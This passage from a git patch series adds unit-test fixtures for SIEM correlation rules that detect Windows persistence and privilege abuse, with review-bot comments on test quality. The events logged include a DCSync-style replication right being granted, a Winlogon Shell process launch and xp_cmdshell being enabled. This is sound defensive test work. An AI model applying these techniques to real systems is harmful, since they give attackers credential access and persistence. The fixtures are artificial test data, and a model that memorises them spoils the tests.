d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913"} \ No newline at end of file From d3bded798f4b64fc2d13326cc092b499b045c156 Mon Sep 17 00:00:00 2001 
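Review bot: The `# Тут будет твой тест. В секции expect укажи…` line before `expect 1` is the scaffold's placeholder text rather than a description of this scenario, and the same placeholder survives in test_1.sc of this rule; with two multi-kilobyte nTSecurityDescriptor values in the fixture, the single ACE that makes the pair a positive is invisible without a comment. Comparing the "value deleted" event with the "value added" event, the added descriptor differs only by `(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)`, i.e. DS-Replication-Get-Changes newly granted to RID 1107 on the domain head (test_1's expected value appears to carry the Get-Changes-All and In-Filtered-Set GUIDs for the same RID as well). I would replace the placeholder with a comment that states exactly that — which ACE is new, that the one expected incident is attributed to the second (value added) 5136 event, and that a lone Get-Changes grant is the case under test — so a later rule change that stops matching on that right fails for a stated reason. From the fixtures visible here, no test seems to exercise a descriptor where only DS-Replication-Get-Changes-All (1131f6ad-…) is added; if that is intended coverage it deserves its own test file. The file also ends without a trailing newline (`\ No newline at end of file`), which is worth normalising across the test set.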
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:20:57 +0300 Subject: [PATCH 44/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82,=20=D1=80=D0=B0=D1=81=D1=88?= =?UTF-8?q?=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4?= =?UTF-8?q?=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80?= =?UTF-8?q?=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0?= =?UTF-8?q?=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2?= =?UTF-8?q?=D0=B8=D0=BB=D0=B0=20(DSRM=5FPassword=5FChanged)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc | 2 +- .../mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc index 54627d09..5e9a8b6f 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc 
@@ -1,3 +1,3 @@ {"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4794\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2017-06-09T19:21:26.9686699Z\"},\"EventRecordID\":\"3139859\",\"Correlation\":{\"ActivityID\":\"{3b48c871-dfe6-0000-a5c8-483be6dfd201}\"},\"Execution\":{\"ProcessID\":\"792\",\"ThreadID\":\"1648\"},\"Channel\":\"Security\",\"Computer\":\"2016dc.hqcorp.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1913345275-1711810662-261465553-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"HQCORP\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2f336f\"},{\"Name\":\"Workstation\",\"text\":\"2016DC\"},{\"Name\":\"Status\",\"text\":\"0x0\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "3093359", "event_src.category": "Directory service", "event_src.fqdn": "2016dc.hqcorp.local", "event_src.host": "2016dc.hqcorp.local", "event_src.hostname": "2016dc", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4794_Attempt_was_made_to_set_DSRM_admin_password", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4794", "normalized": true, "object": "account", "object.property": "password", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-11T06:51:49.598Z", "src.host": "2016dc", "src.hostname": "2016dc", "status": "success", "subject": "account", "subject.account.domain": 
"hqcorp", "subject.account.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.account.name": "administrator", "subject.account.session_id": "3093359", "subject.domain": "hqcorp", "subject.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.name": "administrator", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2017-06-09T19:21:26.968Z", "type": "raw", "uuid": "052d4865-5e2e-4fa9-9f7d-b44fe3463697"} -expect 1 {"correlation_name": "DSRM_Password_Changed"} +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Account Manipulation", "correlation_name": "DSRM_Password_Changed", "correlation_type": "incident", "event_src.fqdn": "2016dc.hqcorp.local", "event_src.host": "2016dc.hqcorp.local", "event_src.hostname": "2016dc", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DSRM_Password_Changed|2016dc.hqcorp.local|s-1-5-21-1913345275-1711810662-261465553-500", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "configuration", "object.property": "password", "src.host": "2016dc", "src.hostname": "2016dc", "status": "success", "subject": "account", "subject.account.domain": "hqcorp", "subject.account.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.account.name": "administrator", "subject.account.session_id": "3093359"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc new file mode 100644 index 00000000..b7819ba2 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc 
@@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4794\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2017-06-09T19:21:26.9686699Z\"},\"EventRecordID\":\"3139859\",\"Correlation\":{\"ActivityID\":\"{3b48c871-dfe6-0000-a5c8-483be6dfd201}\"},\"Execution\":{\"ProcessID\":\"792\",\"ThreadID\":\"1648\"},\"Channel\":\"Security\",\"Computer\":\"2016dc.hqcorp.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1913345275-1711810662-261465553-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"HQCORP\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2f336f\"},{\"Name\":\"Workstation\",\"text\":\"2016DC\"},{\"Name\":\"Status\",\"text\":\"0x0\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "3093359", "event_src.category": "Directory service", "event_src.fqdn": "2016dc.hqcorp.local", "event_src.host": "2016dc.hqcorp.local", "event_src.hostname": "2016dc", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4794_Attempt_was_made_to_set_DSRM_admin_password", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4794", "normalized": true, "object": "account", "object.property": "password", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-11T06:51:49.598Z", "src.host": "2016dc", "src.hostname": "2016dc", "status": "failure", "subject": "account", 
"subject.account.domain": "hqcorp", "subject.account.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.account.name": "administrator", "subject.account.session_id": "3093359", "subject.domain": "hqcorp", "subject.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.name": "administrator", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2017-06-09T19:21:26.968Z", "type": "raw", "uuid": "052d4865-5e2e-4fa9-9f7d-b44fe3463697"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Account Manipulation", "correlation_name": "DSRM_Password_Changed", "correlation_type": "incident", "event_src.fqdn": "2016dc.hqcorp.local", "event_src.host": "2016dc.hqcorp.local", "event_src.hostname": "2016dc", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DSRM_Password_Changed|2016dc.hqcorp.local|s-1-5-21-1913345275-1711810662-261465553-500", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "configuration", "object.property": "password", "src.host": "2016dc", "src.hostname": "2016dc", "status": "failure", "subject": "account", "subject.account.domain": "hqcorp", "subject.account.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.account.name": "administrator", "subject.account.session_id": "3093359"} From 233a21f833fc981f4d20da459dc44f2641b58392 Mon Sep 17 00:00:00 2001 
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Tue, 1 Aug 2023 12:26:28 +0300
Subject: [PATCH 45/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?=
 =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?=
 =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?=
 =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Use=5Fpe?=
 =?UTF-8?q?rsist=5FStart=5Fprocess=5Fvia=5FWinlogonShell)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../tests/test_1.sc | 4 ++++
 .../tests/test_2.sc | 4 ++++
 2 files changed, 8 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_1.sc
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_2.sc

diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_1.sc
new file mode 100644
index 00000000..61a4a2ab
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_1.sc
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-06-14T22:23:13.9571207Z\"},\"EventRecordID\":\"7556\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1960\",\"ThreadID\":\"288\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-06-14 22:23:13.925\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-1e51-5d04-0000-00107b380c00}\"},{\"Name\":\"ProcessId\",\"text\":\"3444\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\9QxTsAU9w8gyPj4w\\\\BRE6BgE2JubB.exe\"},{\"Name\":\"FileVersion\",\"text\":\"1.0.0.0\"},{\"Name\":\"Description\",\"text\":\"NpmTaskRunner\"},{\"Name\":\"Product\",\"text\":\"NpmTaskRunner\"},{\"Name\":\"Company\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\9QxTsAU9w8gyPj4w\\\\BRE6BgE2JubB.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-1e4a-5d04-0000-002013c00b00}\"},{\"Name\":\"LogonId\",\"text\":\"0xbc013\"},{\"Name\":\"TerminalSessionId\",\"text\":\"2\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=E2286C233467D0E164ED5ED1D07BAC9F90F74D19,MD5=41CE32C0D1D4E5BB8C63674F317450EF,SHA256=5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-1e51-5d04-0000-00104c340c00}\"},{\"Name\":\"ParentProcessId\",\"
text\":\"3448\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\userinit.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-1e4a-5d04-0000-002013c00b00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "770067", "object.process.cmdline": "\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\bre6bge2jubb.exe", "object.process.guid": "365abb72-1e51-5d04-0000-00107b380c00", "object.process.hash.imphash": "F34D5F2D4577ED6D9CEEC516C1F5A744", "object.process.hash.md5": "41CE32C0D1D4E5BB8C63674F317450EF", "object.process.hash.sha1": "E2286C233467D0E164ED5ED1D07BAC9F90F74D19", "object.process.hash.sha256": "5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E", "object.process.id": "3444", "object.process.meta": "Description:NpmTaskRunner | Product:NpmTaskRunner | Company:", "object.process.name": "bre6bge2jubb.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\userinit.exe", "object.process.parent.fullpath": 
"c:\\windows\\system32\\userinit.exe", "object.process.parent.guid": "365abb72-1e51-5d04-0000-00104c340c00", "object.process.parent.id": "3448", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\", "object.process.version": "1.0.0.0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T13:21:52.432Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "770067", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-06-14T22:23:13.925Z", "type": "raw", "uuid": "fa1f6a22-a663-4e1c-aef9-e09d7c0168ce"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Persistence", "category.high": "Boot or Logon Autostart Execution", "category.low": "Winlogon Helper DLL", "correlation_name": "Use_persist_Start_process_via_WinlogonShell", "correlation_type": "incident", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Use_persist_Start_process_via_WinlogonShell|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.session_id": "770067", "object.process.cmdline": "\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"", "object.process.cwd": 
"C:\\Windows\\system32\\", "object.process.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\bre6bge2jubb.exe", "object.process.hash.md5": "41CE32C0D1D4E5BB8C63674F317450EF", "object.process.hash.sha1": "E2286C233467D0E164ED5ED1D07BAC9F90F74D19", "object.process.hash.sha256": "5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E", "object.process.id": "3444", "object.process.meta": "Description:NpmTaskRunner | Product:NpmTaskRunner | Company:", "object.process.name": "bre6bge2jubb.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\userinit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.id": "3448", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\", "object.process.version": "1.0.0.0", "status": "success", "subject": "process", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "770067"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_2.sc new file mode 100644 index 00000000..fdbedd00 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_2.sc 
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-02T12:19:09.7649521Z\"},\"EventRecordID\":\"25858687\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"8048\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Администратор\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x1bb77ac\"},{\"Name\":\"NewProcessId\",\"text\":\"0x21b0\"},{\"Name\":\"NewProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"TokenElevationType\",\"text\":\"%%1936\"},{\"Name\":\"ProcessId\",\"text\":\"0x25fc\"},{\"Name\":\"CommandLine\",\"text\":\"c:\\\\windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"TargetUserName\",\"text\":\"-\"},{\"Name\":\"TargetDomainName\",\"text\":\"-\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x0\"},{\"Name\":\"ParentProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\userinit.exe\"},{\"Name\":\"MandatoryLabel\",\"text\":\"S-1-16-12288\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": 
"N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "stand2008", "object.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "object.account.name": "администратор", "object.account.session_id": "29063084", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "8624", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.id": "9724", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T13:32:35.846Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "29063084", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-02T12:19:09.764Z", "type": "raw", "uuid": "16f6ac42-1656-4eb3-9f55-a3a4968856b1"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Persistence", "category.high": "Boot or Logon Autostart Execution", "category.low": "Winlogon Helper DLL", "correlation_name": "Use_persist_Start_process_via_WinlogonShell", "correlation_type": "incident", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Use_persist_Start_process_via_WinlogonShell|win10-work.stand2008.local|s-1-5-21-3800063338-4262557262-2801230003-500", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "stand2008", "object.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "object.account.name": "администратор", "object.account.session_id": "29063084", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "8624", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.id": "9724", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "status": "success", "subject": "process", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "29063084"} From 07d2947840db063262e045040049af5753e56877 Mon Sep 17 00:00:00 2001 
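Review bot: Both tests for this rule are positive cases whose only visible trigger is `object.process.parent.name: userinit.exe`; the legitimate child of userinit.exe — `explorer.exe` as the default Winlogon Shell — is never shown to stay quiet, so a regression that drops whatever check excludes it (not visible in this series) would still pass. Add a test_3 that feeds a 4688 identical to this one with `NewProcessName` `C:\\Windows\\explorer.exe` and expects no correlation, in whatever form the harness uses for zero hits. The placeholder `# Тут будет твой тест. …` should also become a one-line description, e.g. `# 4688 (no Sysmon): cmd.exe spawned by userinit.exe — expect one Winlogon Shell persistence incident`.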
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Tue, 1 Aug 2023 12:45:54 +0300
Subject: [PATCH 46/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?=
 =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?=
 =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?=
 =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(XP=5FCmd?=
 =?UTF-8?q?shell=5FEnable)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc | 4 ++++
 .../mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc | 5 +++++
 2 files changed, 9 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_2.sc

diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc
new file mode 100644
index 00000000..df9cf690
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/XP_Cmdshell_Enable/tests/test_1.sc
@@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"MSSQLSERVER\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"15457\"},\"Level\":\"4\",\"Task\":\"2\",\"Keywords\":\"0x80000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-11-04T09:27:26.1586215Z\"},\"EventRecordID\":\"9692\",\"Channel\":\"Application\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[\"xp_cmdshell\",\"0\",\"1\"],\"Binary\":\"613C00000A0000000C0000004D0053004500440047004500570049004E00310030000000070000006D00610073007400650072000000\"}}}", "event_src.category": "Database server", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_SQL_Server_eventlog_15457_Parameter_enabled", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "15457", "normalized": true, "object": "configuration", "object.property": "parameter", "object.value": "xp_cmdshell", "reason": "parameter enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T11:07:51.676Z", "status": "success", "subject": "account", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-11-04T09:27:26.158Z", "type": "raw", "uuid": "ec2cc867-431a-4238-9d69-8e4720b3f22d"} + 